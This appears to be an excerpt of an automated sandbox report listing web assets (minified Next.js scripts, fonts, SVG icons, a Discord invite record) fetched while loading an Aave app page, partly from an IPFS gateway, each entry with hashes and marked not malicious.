                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4345],{91166:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return Ve}});var r=n(49501),a=n(62097),o=n(61225),s=n(29630),i=n(79072),c=n(5152),l=n(67294),d=n(34637),u=n(59379),x=n(59631),p=n(75331),h=n(56365),v=n(75084),f=n(30120),g=n(81645),j=n(28533),m=n(68861),b=n(78371),y=n(57609),w=n(74815),Z=n(85893);function P(e){var t=e.text,n=e.href,r=(0,b.Y)((function(e){return e.trackEvent}));return(0,Z.jsx)(v.Z,{variant:"surface",size:"small",sx:{minWidth:"unset"},component:m.rU,href:n,target:"_blank",rel:"noopener",onClick:function(){return r(y.vh.EXTERNAL_LINK,{Link:t})},children:(0,Z.jsxs)(f.Z,{sx:{display:"flex",alignItems:"center"},children:[t,(0,Z.jsx)(g.Z,{sx:{ml:1,fontSize:14},children:(0,Z.jsx)(h.Z,{})})]})})}var A,C=function(){var e=(0,a.Z)(),t=(0,o.Z)(e.breakpoints.up("lg")),n=(0,o.Z)(e.breakpoints.down("xsm")),i=(0,b.Y)((function(e){return e.trackEvent}));return(0,Z.jsx)(w.f,{titleComponent:(0,Z.jsxs)(f.Z,{mb
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 105924, version 1.0
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):105924
                                                                                                                                                                                                                                                  Entropy (8bit):7.99656515123012
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:3072:7Jk35GDAni+UzuVEjLH8MSP02J5E4ZjJffp:7ys0iIEjz8MNGRfp
                                                                                                                                                                                                                                                  MD5:75DB5319E7E87C587019A5DF08D7272C
                                                                                                                                                                                                                                                  SHA1:92B30527304B5DC80F45E997E0B1AC4C70110A18
                                                                                                                                                                                                                                                  SHA-256:1B498B959E5B7DECBF9185803591D25BC1FBF83E798372ED30D32D5C79D82FF6
                                                                                                                                                                                                                                                  SHA-512:4E556D80B52DDBADDDF9287F6CDAEF0D12113D0FA4A07728FD67767B97806EBA5FA0F82711F71E76EE2875192D7618A9B6C277CEB6D69A30F76CA8E3EBB74AA1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/media/Inter-Medium.dc792b50.woff2
                                                                                                                                                                                                                                                  Preview:wOF2...................e..............................r...J.`.......0.....T..6.$..N. ......-[U4..*...9-.I..J.*h....O .kD3=,(].e.Q.{..Ip...Q..-E~x...^...Y.....g..............7.....7.....$...;....'H...V..0.j...F1..A..H.sL...+..%.j."I...n......c0..1..&.L.%.U.M.)f>A<'.9......Z....+n..)$8...F.)..4..l......a.A.\...2.....c..\....},...Y.i.W.'.x.....y.T......ev$..`G.$m.O"B..k;n...t...N.'r..w..C8.fcb.LJ%j...$i=.I.P2.ns.L..l.."|......j.....8.^.i.....p.*[.i.:...0.E....}4pS<...y.....*.......=..LI%..[5..#n...2o..^..F!.G"...XV^.D......;.@.......#2.m.g.....fq~..u..A.CS..d.c.)R...D.4&..[.$.....U.W.id.+..r...Z&..._....P..)...;..v.9/.a..z......kf>c......_...k..e0Y......eF.8..}K......{.SH ......p.....X...kN.4..".Q......#s...../. ...1..C.....]P+2Pv!d/.,..8.4VNw...q..<A....m.Y...B..".>P{.L._......6H.9...4..l|......Z..e..../^B..}E..o.;......bk7.r..C.v..5.3..Wv..T..#X+Q...0.G.d..j_...<.....s.F.-...<..qq..d......}..i..A...;.Y+.]UU)"..'.9..N.4M.W..?.0.C...d.+.......
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (31848), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):31848
                                                                                                                                                                                                                                                  Entropy (8bit):5.551056037443256
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:CyPQpv2tTve/VeiWVecfO493+pO1Mrze9ESPl05GcOCFlFPB:I+UkReTxpPYl0MM
                                                                                                                                                                                                                                                  MD5:B722F5F8EE79F46DC074BB4D3D655B6E
                                                                                                                                                                                                                                                  SHA1:E086CBB0C7C6E7AD55780244F4ACFA77A0F8F651
                                                                                                                                                                                                                                                  SHA-256:A6554FEBEDB7E66DBEA6127167179E2368FEC2F91664631AE8DBCFB19E43CEA9
                                                                                                                                                                                                                                                  SHA-512:0CDDF7960617938C8C43B51F2AE279C78BF5584560F1E86D177A805369EEED63EEF3BADBFC8AE820BF11E417D369D4CA28F012F1D61576C42EF09B0BB7C8F9C0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/1066.9e549ab8e48c2ae2.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1066],{62753:function(e,n,t){var r=t(64836);n.Z=void 0;var o=r(t(64938)),i=t(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");n.Z=a},75158:function(e,n,t){t.d(n,{Z:function(){return Z}});var r=t(63366),o=t(87462),i=t(67294),a=t(86010),s=t(94780),c=t(41796),l=t(37743),d=t(54235),u=t(85893),x=(0,d.Z)((0,u.jsx)("path",{d:"M19 5v14H5V5h14m0-2H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2z"}),"CheckBoxOutlineBlank"),p=(0,d.Z)((0,u.jsx)("path",{d:"M19 3H5c-1.11 0-2 .9-2 2v14c0 1.1.89 2 2 2h14c1.11 0 2-.9 2-2V5c0-1.1-.89-2-2-2zm-9 1
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9876), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):9876
                                                                                                                                                                                                                                                  Entropy (8bit):5.284716799878069
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:h9bEDHZT0TA7l6D2Kt0RwzGwsV8oXiTRIvu664:WAQ
                                                                                                                                                                                                                                                  MD5:009EAE380D18E68D02FD3B1EFE0B3979
                                                                                                                                                                                                                                                  SHA1:F16F04E668DE6B1960B8E060A897AAAD24B7DC69
                                                                                                                                                                                                                                                  SHA-256:3B970DE2228A8DFAD7880CCA281E91DB8DB698E103B8925638915287AEF6032F
                                                                                                                                                                                                                                                  SHA-512:A8C53DBAEC8788C3AA137A75E43E5119708617574CE641FA88BC0B54AE745D3BD414BBF29D4203DA8623BDCEFCA2C8EAF8F83E17091F66F36B38D8B559EE0DE2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3629],{43629:function(e,r,t){t.d(r,{hv:function(){return W},rM:function(){return J},wD:function(){return K},ov:function(){return H}});var n=t(59499),o=t(4730),i=t(1279),c=t(67294),s=t(49501),a=t(58771),p=t(30120),l=t(68861),u=t(58527),b=t(85893),d=["borrowCap"];function f(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);r&&(n=n.filter((function(r){return Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,n)}return t}function y(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?f(Object(t),!0).forEach((function(r){(0,n.Z)(e,r,t[r])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):f(Object(t)).forEach((function(r){Object.defineProperty(e,r,Object.getOwnPropertyDescriptor(t,r))}))}return e}var j=function(e){var r=e.borrowCap,t=(0,o.Z)(e,d);return r&&r.isMaxed?(0,b.jsx)(p.Z,{s
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11915), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):11915
                                                                                                                                                                                                                                                  Entropy (8bit):5.350458456377442
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:tOwLI0HaEnGUgXY/s3pCXI5Uaxd+CH0eO+dXq8rFI995W3ax:A30FHsY0pMIWLs0eOYq8rY95yI
                                                                                                                                                                                                                                                  MD5:0B24C625578C26E207A37085A2E36E17
                                                                                                                                                                                                                                                  SHA1:B034EC41B67A8411B84329346689900B58FFD157
                                                                                                                                                                                                                                                  SHA-256:074EB364CF5F95FCE6C2B93B53E6E86637E90C2BC98FEEF126514E0340CEFE2E
                                                                                                                                                                                                                                                  SHA-512:FDE7659612DA1B403E6373934886E1A198E99A472A0B7AC29D6DC9A38724AB88826D0A85047CC776D384DF9A390F458B59803E3B138C3B8BC4CC615ED791B8F7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1320],{96875:function(e,n,r){r.d(n,{o:function(){return m}});var t=r(59499),i=r(4730),o=r(49501),c=r(1279),s=r(62097),a=r(30120),l=r(29630),d=r(75084),x=r(70794),u=r(41024),p=r(85893),j=["value","onInfoClick","HALIntegrationComponent"];function f(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwnPropertySymbols(e);n&&(t=t.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),r.push.apply(r,t)}return r}function h(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?f(Object(r),!0).forEach((function(n){(0,t.Z)(e,n,r[n])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):f(Object(r)).forEach((function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}))}return e}var m=function(e){var n=e.value,r=e.onInfoClick,t=e.HALIntegrationComponent,f=(0,i.Z)(e,j),m=(0,s.Z)().palette,v=
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):139
                                                                                                                                                                                                                                                  Entropy (8bit):4.710597482771287
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:t6WH7W+lFAATcvdnmFFSDDmJS4RKb5KGMXf/FGc8qQAGrqLW:t6Abli/m03mc4sldMX9QAw
                                                                                                                                                                                                                                                  MD5:72A8B168AD2C7EEA7B2559B5690C7695
                                                                                                                                                                                                                                                  SHA1:85E4F43154EA713C832BA27128A33EB7B2A7CF7A
                                                                                                                                                                                                                                                  SHA-256:1F988D1AD4AB163D61A584254C07D75F3241EB6380BF48BF7D8F981E13C092CD
                                                                                                                                                                                                                                                  SHA-512:11BCB1A3623B97C9DD2F22D0389B3CA05AB4F99596DE5D07C50C1FC83F7532D8C20B58379C54C38F503D86D8C2CAF52AF3B35FFCCDC4750089ABAF86C1C5294E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg fill="none" height="8" viewBox="0 0 8 8" width="8" xmlns="http://www.w3.org/2000/svg"><circle cx="4" cy="4" r="4" fill="#fff"/></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4804
                                                                                                                                                                                                                                                  Entropy (8bit):3.9838661314243433
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:Ez1Y5tmUKv0bhb9lsqYnlV4XdUo4e7JR0Tn515GGNj1j:eWtRK8Z4qYnlV4Xdt6RGaj1j
                                                                                                                                                                                                                                                  MD5:22FD790491653D837422D80E3500CF92
                                                                                                                                                                                                                                                  SHA1:E0618307DDC1E06D85729819B115D0652ABB148C
                                                                                                                                                                                                                                                  SHA-256:641B1091276BA75578C3D93F367F0D70BCBBA7C62A7F159C4307ACF0ED6C5CBE
                                                                                                                                                                                                                                                  SHA-512:AD2100B9391969B160D3DE80C7310CF5706B89CD097D8B48D6DF0D96E9CFB73C15DDD487DF7773C28094A152EC9D4F8F6E6B718C96FAF734708018C65511266E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg fill="none" height="36" viewBox="0 0 130 36" width="130" xmlns="http://www.w3.org/2000/svg"><g fill="#fff"><path d="m27.5247 8.06243c-2.1034-.96349-4.3524-1.66374-6.7036-2.06243-.2888.51114-.6261 1.19861-.8587 1.74553-2.4995-.36802-4.9759-.36802-7.4293 0-.2326-.54692-.5777-1.23439-.869-1.74553-2.35376.39869-4.60533 1.1015-6.70864 2.06754-4.242451 6.27676-5.392506 12.39766-4.817478 18.43156 2.813808 2.0574 5.540698 3.3071 8.221628 4.1249.6619-.892 1.25228-1.8401 1.76089-2.8394-.96862-.3603-1.89634-.805-2.77294-1.3213.23259-.1686.46001-.345.67979-.5265 5.34655 2.4484 11.15555 2.4484 16.43815 0 .2224.1815.4498.3579.6798.5265-.8791.5188-1.8094.9635-2.778 1.3239.5086.9967 1.0964 1.9474 1.7609 2.8393 2.6834-.8178 5.4129-2.0675 8.2267-4.1274.6747-6.9949-1.1526-13.0595-4.8302-18.43667zm-16.6759 14.72587c-1.6049 0-2.92111-1.467-2.92111-3.2534s1.28807-3.2559 2.92111-3.2559c1.6331 0 2.9493 1.4669 2.9212 3.2559.0025 1.7864-1.2881 3.2534-2.9212 3.2534zm10.7952 0c-1.6049 0-2.9211-1.467-2.9211-3
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1090
                                                                                                                                                                                                                                                  Entropy (8bit):5.492365466240539
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:Y7ro6fkugm9fZN3wD8R64I8akV76CAlciTk0rj8o:Y7U0kugm9fH37RXV769lcnYjD
                                                                                                                                                                                                                                                  MD5:DC03348AC423117ACD02BFBAB1212743
                                                                                                                                                                                                                                                  SHA1:043AE920A93F2BD221AA4C60A8F68F7B76A7496F
                                                                                                                                                                                                                                                  SHA-256:E68C6AFF2D61A25F9E021F3529F26022EEDF13844669B927797C5E929A874225
                                                                                                                                                                                                                                                  SHA-512:4AA0EEF5AE3391E985B2B9C843AF90ED2CB361EA94FA77998DE69323C853D08EBD69B4BDE2B11570AE20D723B8907EF7303F526144D92405B2685861F530E801
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:{"type":0,"code":"aave","expires_at":null,"flags":2,"guild":{"id":"602826299974877205","name":"Aave Community","splash":"26d834daa945e775d8af2935a04f83e7","banner":"0cb872905cbb21b9459917b0f4ad59d5","description":"The Aave Protocol is an open source, decentralized, non-custodial liquidity protocol.","icon":"85edbf0edebc2025a16a76b89b1cb937","features":["DISCOVERABLE","VANITY_URL","CHANNEL_ICON_EMOJIS_GENERATED","ANIMATED_ICON","ANIMATED_BANNER","INVITE_SPLASH","SEVEN_DAY_THREAD_ARCHIVE","WELCOME_SCREEN_ENABLED","PREVIEW_ENABLED","BANNER","MEMBER_PROFILES","NEWS","ROLE_ICONS","AUTO_MODERATION","THREE_DAY_THREAD_ARCHIVE","MEMBER_VERIFICATION_GATE_ENABLED","ENABLED_DISCOVERABLE_BEFORE","GUILD_HOME_TEST","THREADS_ENABLED","COMMUNITY","NEW_THREAD_PERMISSIONS","GUILD_WEB_PAGE_VANITY_URL","PRIVATE_THREADS"],"verification_level":4,"vanity_url_code":"aave","nsfw_level":0,"nsfw":false,"premium_subscription_count":16},"guild_id":"602826299974877205","channel":{"id":"1065814556636610622","type":0,
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (15252), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):15252
                                                                                                                                                                                                                                                  Entropy (8bit):5.474899566567033
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:E7ibegv0VRKGayRI7OzFxQg1LWOBEAVyQGQYGbYsieX:E7hlI7Oz1j+QPYGbFX
                                                                                                                                                                                                                                                  MD5:76F49210C60C9D60C710E152F41CB7D8
                                                                                                                                                                                                                                                  SHA1:853FFDFF1737BDEC7F0AF816EF8A575824A5AC1A
                                                                                                                                                                                                                                                  SHA-256:5E073964E4BC63E1D81BEB8DB000BBC0CAD7827D1DFAE8BDEA0C6FBB1B20A7E8
                                                                                                                                                                                                                                                  SHA-512:548AD0E2CCD4F4517AFADE323DBD95A7206E6317EC0B7F94D3AD3A60BA4D2F66E88444212E1218258C5346D0073161E346BA5FC052003B52BC45C6F4BE43EC76
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/6504.7680acad69b7b910.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6504],{89722:function(e,t,r){r.d(t,{Z:function(){return b}});var n=r(87462),o=r(63366),i=r(67294),a=r(86010),s=r(94780),l=r(81719),c=r(78884),u=r(36622),d=r(34867);function m(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var p=r(85893);const f=["baseClassName","className","color","component","fontSize"],v=(0,l.ZP)("span",{name:"MuiIcon",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:r}=e;return[t.root,"inherit"!==r.color&&t[`color${(0,u.Z)(r.color)}`],t[`fontSize${(0,u.Z)(r.fontSize)}`]]}})((({theme:e,ownerState:t})=>({userSelect:"none",width:"1em",height:"1em",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (23986), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):23986
                                                                                                                                                                                                                                                  Entropy (8bit):5.495770589824078
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:xyPmyJ2bTQVVeiHfeZVelMzjmATnhCsR5+iYPTpyEOVdp2N/zH:xyPwWVecfOVelMnmmnhCsii01Gp2VzH
                                                                                                                                                                                                                                                  MD5:6FDE7934F047CACADA9F17DB3FA0F110
                                                                                                                                                                                                                                                  SHA1:425BBE8E3E3B71E18781CD86267BED79E8D74C52
                                                                                                                                                                                                                                                  SHA-256:1A7AAFF94E3147A03B8109FFC467570D06556F9F8AE5F5D44CDAFAEE5CDB4FBD
                                                                                                                                                                                                                                                  SHA-512:50884D003DD70372CF60FEF9BEDFDE1DFDC5A425F0083D00E121D652240A055E938E87E7758231C1BD77A4F21CC7830EF28D3ADB4D8146488508DA2A6D3430F1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/6790.20f08621bfb8840e.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6790],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),i=r(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},96875:function(e,t,r){r.d(t,{o:function(){return j}});var n=r(59499),o=r(4730),i=r(49501),a=r(1279),s=r(62097),c=r(30120),l=r(29630),u=r(75084),d=r(70794),p=r(41024),x=r(85893),f=["value","onInfoClick"];function m(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 105804, version 1.0
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):105804
                                                                                                                                                                                                                                                  Entropy (8bit):7.9975388815479675
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:3072:wo/8sikhizn8CQRxZ9UXsfH0K1yjewt8G5VYqLS8b:a5z3iHCAHjaJtZ5dLS8b
                                                                                                                                                                                                                                                  MD5:007AD31A53F4AB3F58EE74F2308482CE
                                                                                                                                                                                                                                                  SHA1:DFA9F8F3D79BF8A0001FE72EEADAD0490CBA59CC
                                                                                                                                                                                                                                                  SHA-256:152261291C938AA5AAD6A56D52B47FFCB893D1C0387E76D7F270A7382FF786D5
                                                                                                                                                                                                                                                  SHA-512:48AEF263ACA876BA4DB5A596FBB8332524D6B440A8A516E1BAA7899F2F1DA0E1C44452D0380869EC455D27A6E0B931210B1FB669B36E36914CA27235F34E8558
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/media/Inter-SemiBold.fcb100c7.woff2
                                                                                                                                                                                                                                                  Preview:wOF2.......L.......@..................................@...J.`.......l.....T..6.$..N. ..$...-[73..O.....q....8Vg.A....._#..z.6..........!2.........2{..T..~..........................#...L...n....@.G..............m..(..!.N5..3..N....%..Y.$..i.(..V.n.G:L..K.eE|..!.hF..4..h.6F..D.h K.vRO1cT=..v...Z.l.9.{GsV..%.p.@...K*.IK\.Vb.=.g.#nm...f.1Y.m!.....M..'.P.vM".LBK.U....UI.6.F...d.y.Ej<.....l.R..N..;....!w....Q..%..;3...1...#.u4....W.tb.{.+d.....=c.F...#.|.?.......n.aV.l..p....A/..X.F...[........f.O...:..5.F..o'..{a..2......n..w.Q.d...B.O.\k.d...........=7...>.....@.B>zY~.e+>A.0".............n..7..4.%..........o.~.....=N.V..C.Z.......?.)Y...c.....[.|.OM..0["l.z...W[...I.......N..c!W/=.oX..e..f.5&G..g....#.."..b..&0.+...........H....#.P!..)Kgd...t.GLL..|0.x..Q.....56.6.Y.}...v2Y.....W.\.1\<6....?..~.1.#q....~.|F\....E..;.>..y...}.f....['.....sa?.6...{?......G.W............<......gZ.!Jr..Y=b..........G.....`.3{.".I.:...9..'...9.iLm..X.....?$..".p..g
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):449
                                                                                                                                                                                                                                                  Entropy (8bit):5.193136170719881
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:tnr0Qol8GcAumc4slZ8CirSgPAYlO9fPcpZGKYSQkGdQqncdnGXmuQoQqiK8AcAL:tr0dmGtuBcPRlgfPaGHsdGXNdQQ88L
                                                                                                                                                                                                                                                  MD5:1F4B4F940ACA49012D8D6D27EC05EEB7
                                                                                                                                                                                                                                                  SHA1:08207179BCAFD60964874A09B6428C8915AEB76D
                                                                                                                                                                                                                                                  SHA-256:E0C660872D4FF92F71591408DB5BE729E4E863907CE6906BE0A794A83660FEC8
                                                                                                                                                                                                                                                  SHA-512:EAADD8B66226DEA34055C924E5F3E3E7EFC7CF61030690807138AD46C200E2E2BD63EB6AFE08ED78431B8DF3BC68853E95AD409B5397D9610A9CFF02C68B72B1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg width="20" height="20" viewBox="0 0 20 14" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)"><path d="M21 3H0v14h21V3Z" fill="#0D5EAF"/><path d="M21 16H0v-1.623h21V16Zm0-3.25H0v-1.623h3.111v-3.25H0V6.25h3.111V3h1.554v3.25h3.112v1.623H21v1.623H7.777V7.873H4.665v3.25H21v1.627Zm0-6.5H7.777V4.623H21V6.25Z" fill="#fff"/></g><defs><clipPath id="a"><rect y="3" width="20" height="14" rx="2" fill="#fff"/></clipPath></defs></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2368), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):2368
                                                                                                                                                                                                                                                  Entropy (8bit):5.20965218861483
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:Zrd4UcM05QGVAEIbXJZzE7Ip3HJUj7xzPvQ58yhC74KXuI3IJV1pTaArCscVGnxz:tdedyEgJusp3Hg7qmyhNKfyVGAHcV+
                                                                                                                                                                                                                                                  MD5:B30ED08ED3B10CBD2BC9111BDD486D7B
                                                                                                                                                                                                                                                  SHA1:B1C3EB8E04D3FC8DD1587538FF508A63697E9344
                                                                                                                                                                                                                                                  SHA-256:72441A2B0D819C80AA792034F8AAAF3E3EF431B8B17EDB37769109FE81013888
                                                                                                                                                                                                                                                  SHA-512:50F1008EFC7AF8E927BC1E90CC5CF58C2F293498690A5A238167B0D261C430C40D8F275443A6345A04762F8C8B2D232A132AEFD8246DF81576945365353C82FE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/qfKi0l7EhUa_QqPERmaKb/_buildManifest.js
